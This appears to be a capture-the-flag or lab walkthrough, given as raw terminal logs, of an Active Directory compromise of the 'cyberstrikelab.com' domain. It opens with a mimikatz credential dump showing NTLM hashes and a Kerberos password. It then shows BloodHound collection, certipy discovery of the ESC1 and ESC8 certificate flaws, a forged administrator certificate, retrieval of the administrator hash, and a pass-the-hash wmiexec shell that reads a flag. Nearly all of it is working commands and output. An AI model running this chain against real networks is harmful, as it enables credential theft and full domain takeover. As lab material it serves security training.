0a4c17b8f051223716e86c36f1dec902e266c773tspkg :wdigest : * Username : CYBERWEB$ * Domain   : CYBERSTRIKELAB * Password : (null)kerberos : * Username : CYBERWEB$ * Domain   : cyberstrikelab.com * Password : I@w2(l8:$e9`bRA7&$Rxd^f@6+_,hgL)&Ck6he8vlsS7*=[e*%bh-wZ.,$HV(0^!/q0eY=sDH_1)6jK3v;#%kt[5YSXt3$y/;R(wAqp1p_`""m=o:Q;HtsYssp :credman :Authentication Id : 0 ; 23220(00000000:00005ab4)Session           : UndefinedLogonType from 0User Name         : (null)Domain         : (null)Logon Server   : (null)Logon Time     : 2025/5/22 7:28:06SID               :msv : [00000003] Primary * Username : CYBERWEB$ * Domain   : CYBERSTRIKELAB * NTLM     : 331dcbb88d1a4847c97eab7c1c168ac8 * SHA1     : 0a4c17b8f051223716e86c36f1dec902e266c773tspkg :wdigest :kerberos :ssp :credman :Authentication Id : 0 ; 999(00000000:000003e7)Session           : UndefinedLogonType from 0User Name         : CYBERWEB$Domain         : CYBERSTRIKELABLogon Server   : (null)Logon Time     : 2025/5/22 7:28:05SID               : S-1-5-18msv :tspkg :wdigest : * Username : CYBERWEB$ * Domain   : CYBERSTRIKELAB * Password : (null)kerberos : * Username : cyberweb$ * Domain   : CYBERSTRIKELAB.COM * Password : (null)ssp :credman :mimikatz(commandline) # exitBye!

ounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(line❯ netexec ldap 10.6.6.55 -u cslab -H 39b0e84f13872f51efb3b8ba5018c517   --bloodhound -c All  --dns-server 10.6.6.55  --dns-tcpSMB         10.6.6.55       445    DC               [*] Windows Server 2016 Standard 14393 x64 (name:DC) (domain:cyberstrikelab.com) (signing:True) (SMBv1:True)LDAP        10.6.6.55       389    DC               [+] cyberstrikelab.comcslab:39b0e84f13872f51efb3b8ba5018c517LDAP        10.6.6.55       389    DC               Resolved collection methods: container, localadmin, acl, group, psremote, objectprops, dcom, rdp, trusts, session[19:52:14] ERROR    Unhandled exception in computer DC.cyberstrikelab.com processing: The NETBIOS connection with the remote host timed out.                      computers.py:270LDAP        10.6.6.55       389    DC               Done in 00M 58SLDAP        10.6.6.55       389    DC               Compressing output into /Users/a/.nxc/logs/DC_10.6.6.55_2025-05-22_195130_bloodhound.zip

ounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(line❯ certipy find -vuln  -u cslab -hashes :39b0e84f13872f51efb3b8ba5018c517  -dc-ip 10.6.6.55 -ns 10.6.6.55 -dns-tcp -debugCertipy v4.8.2 - by Oliver Lyak (ly4k)[+] Authenticating to LDAP server[+] Bound to ldaps://10.6.6.55:636 - ssl[+] Default path: DC=cyberstrikelab,DC=com[+] Configuration path: CN=Configuration,DC=cyberstrikelab,DC=com[+] Adding Domain Computers to list of current user's SIDs[+] List of current user's SIDs:     CYBERSTRIKELAB.COMDomain Computers (S-1-5-21-4286488488-1212600890-1604239976-515)     CYBERSTRIKELAB.COMEveryone (CYBERSTRIKELAB.COM-S-1-1-0)     CYBERSTRIKELAB.COMUsers (CYBERSTRIKELAB.COM-S-1-5-32-545)     CYBERSTRIKELAB.COMAuthenticated Users (CYBERSTRIKELAB.COM-S-1-5-11)     CYBERSTRIKELAB.COMDomain Users (S-1-5-21-4286488488-1212600890-1604239976-513)     CYBERSTRIKELAB.COMcslab (S-1-5-21-4286488488-1212600890-1604239976-1104)[*] Finding certificate templates[*] Found 34 certificate templates[*] Finding certificate authorities[*] Found 1 certificate authority[*] Found 12 enabled certificate templates[+] Trying to resolve 'DC.cyberstrikelab.com' at '10.6.6.55'[*] Trying to get CA configuration for 'cyberstrikelab-DC-CA' via CSRA[+] Trying to get DCOM connection for: 10.6.6.55[!] Got error while trying to get CA configuration for 'cyberstrikelab-DC-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.[*] Trying to get CA configuration for 'cyberstrikelab-DC-CA' via RRP[!] Failed to connect to remote registry. Service should be starting now. Trying again...[+] Connected to remote registry at 'DC.cyberstrikelab.com' (10.6.6.55)[*] Got CA configuration for 'cyberstrikelab-DC-CA'[+] Resolved 'DC.cyberstrikelab.com' from cache: 10.6.6.55[+] Connecting to 10.6.6.55:80[*] Saved BloodHound data to '20250522202934_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k[*] Saved text output to '20250522202934_Certipy.txt'[*] Saved JSON output to '20250522202934_Certipy.json'

ounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(line❯ cat 20250522202934_Certipy.txtCertificate Authorities  0    CA Name                             : cyberstrikelab-DC-CA    DNS Name                         : DC.cyberstrikelab.com    Certificate Subject                 : CN=cyberstrikelab-DC-CA, DC=cyberstrikelab, DC=com    Certificate Serial Number           : 652A47597C7F03824B7815EBE474E40B    Certificate Validity Start       : 2025-04-22 07:45:38+00:00    Certificate Validity End         : 2030-04-22 07:55:38+00:00    Web Enrollment                   : Enabled    User Specified SAN               : Disabled    Request Disposition                 : Issue    Enforce Encryption for Requests     : Enabled    Permissions      Owner                             : CYBERSTRIKELAB.COMAdministrators      Access Rights        ManageCertificates           : CYBERSTRIKELAB.COMAdministrators                                          CYBERSTRIKELAB.COMDomain Admins                                          CYBERSTRIKELAB.COMEnterprise Admins        ManageCa                     : CYBERSTRIKELAB.COMAdministrators                                          CYBERSTRIKELAB.COMDomain Admins                                          CYBERSTRIKELAB.COMEnterprise Admins        Enroll                       : CYBERSTRIKELAB.COMAuthenticated Users    [!] Vulnerabilities      ESC8                           : Web Enrollment is enabled and Request Disposition is set to IssueCertificate Templates  0    Template Name                       : DC    Display Name                     : DC    Certificate Authorities             : cyberstrikelab-DC-CA    Enabled                             : True    Client Authentication               : True    Enrollment Agent                 : False    Any Purpose                         : False    Enrollee Supplies Subject           : True    Certificate Name Flag               : EnrolleeSuppliesSubject    Enrollment Flag                     : None    Private Key Flag                 : 16842752    Extended Key Usage               : Client Authentication    Requires Manager Approval           : False    Requires Key Archival               : False    Authorized Signatures Required   : 0    Validity Period                     : 1 year    Renewal Period                   : 6 weeks    Minimum RSA Key Length           : 2048    Permissions      Enrollment Permissions        Enrollment Rights               : CYBERSTRIKELAB.COMDomain Users                                          CYBERSTRIKELAB.COMDomain Admins                                          CYBERSTRIKELAB.COMDomain Computers                                          CYBERSTRIKELAB.COMEnterprise Admins                                          CYBERSTRIKELAB.COMAuthenticated Users      Object Control Permissions        Owner                           : CYBERSTRIKELAB.COMAdministrator        Write Owner Principals       : CYBERSTRIKELAB.COMDomain Admins                                          CYBERSTRIKELAB.COMEnterprise Admins                                          CYBERSTRIKELAB.COMAdministrator        Write Dacl Principals           : CYBERSTRIKELAB.COMDomain Admins                                          CYBERSTRIKELAB.COMEnterprise Admins                                          CYBERSTRIKELAB.COMAdministrator        Write Property Principals       : CYBERSTRIKELAB.COMDomain Admins                                          CYBERSTRIKELAB.COMEnterprise Admins                                          CYBERSTRIKELAB.COMAdministrator    [!] Vulnerabilities      ESC1                           : 'CYBERSTRIKELAB.COM\Domain Users', 'CYBERSTRIKELAB.COM\Domain Computers' and 'CYBERSTRIKELAB.COM\Authenticated Users' can enroll, enrollee supplies subject and template allows client authentication

ounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(line❯ certipy  req -u cslab -hashes :39b0e84f13872f51efb3b8ba5018c517  -dc-ip 10.6.6.55 -ns 10.6.6.55 -dns-tcp -template DC  -ca cyberstrikelab-DC-CA -debug -upn administratorCertipy v4.8.2 - by Oliver Lyak (ly4k)[+] Generating RSA key[*] Requesting certificate via RPC[+] Trying to connect to endpoint: ncacn_np:10.6.6.55[pipecert][+] Connected to endpoint: ncacn_np:10.6.6.55[pipecert][*] Successfully requested certificate[*] Request ID is 10[*] Got certificate with UPN 'administrator'[*] Certificate has no object SID[*] Saved certificate and private key to 'administrator.pfx'

ounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(line❯ certipy auth -pfx administrator.pfx -domain cyberstrike.com -dc-ip 10.6.6.55 -ns 10.6.6.55 -debug -username administrator -domain CYBERSTRIKELAB.COMCertipy v4.8.2 - by Oliver Lyak (ly4k)[*] Using principal: administrator@cyberstrikelab.com[*] Trying to get TGT...[*] Got TGT[*] Saved credential cache to 'administrator.ccache'[*] Trying to retrieve NT hash for 'administrator'[*] Got hash for '[email protected]': aad3b435b51404eeaad3b435b51404ee:28cfbc91020438f2a064a63fff9871fa

ounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(line❯ wmiexec.py cyberstrike.com/administrator@10.6.6.55  -hashes :28cfbc91020438f2a064a63fff9871fa/opt/homebrew/bin/wmiexec.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html  __import__('pkg_resources').run_script('impacket==0.11.0', 'wmiexec.py')Impacket v0.11.0 - Copyright 2023 Fortra[*] SMBv3.0 dialect used[!] Launching semi-interactive shell - Careful what you execute[!] Press help for extra shell commandsC:>type c:/flag.txt[-] Decoding error detected, consider running chcp.com at the target,map the result with https://docs.python.org/3/library/codecs.html#standard-encodingsand then execute wmiexec.py again with -codec and the corresponding codec�����﷨����ȷ��C:>dir c:/[-] Decoding error detected, consider running chcp.com at the target,map the result with https://docs.python.org/3/library/codecs.html#standard-encodingsand then execute wmiexec.py again with -codec and the corresponding codec��Ч���� - ""��C:>dir c:[-] Decoding error detected, consider running chcp.com at the target,map the result with https://docs.python.org/3/library/codecs.html#standard-encodingsand then execute wmiexec.py again with -codec and the corresponding codec ������ C �еľ�û�б�ǩ�� �������к��� 2C36-C1B6 c: ��Ŀ¼2025/04/22  16:37                45 flag.txt2025/04/22  15:53    <DIR>          inetpub2025/04/22  15:43    <DIR>          PerfLogs2018/02/03  03:38    <DIR>          Program Files2016/07/16  21:23    <DIR>          Program Files (x86)2025/04/22  15:54    <DIR>          Users2025/05/22  20:39    <DIR>          Windows               1 ���ļ�             45 �ֽ�               6 ��Ŀ¼ 26,064,306,176 �����ֽ�C:>type c:flag.txtgo-flag{1DDE7826-F56B-486D-A661-E9AA83874EFA}C:>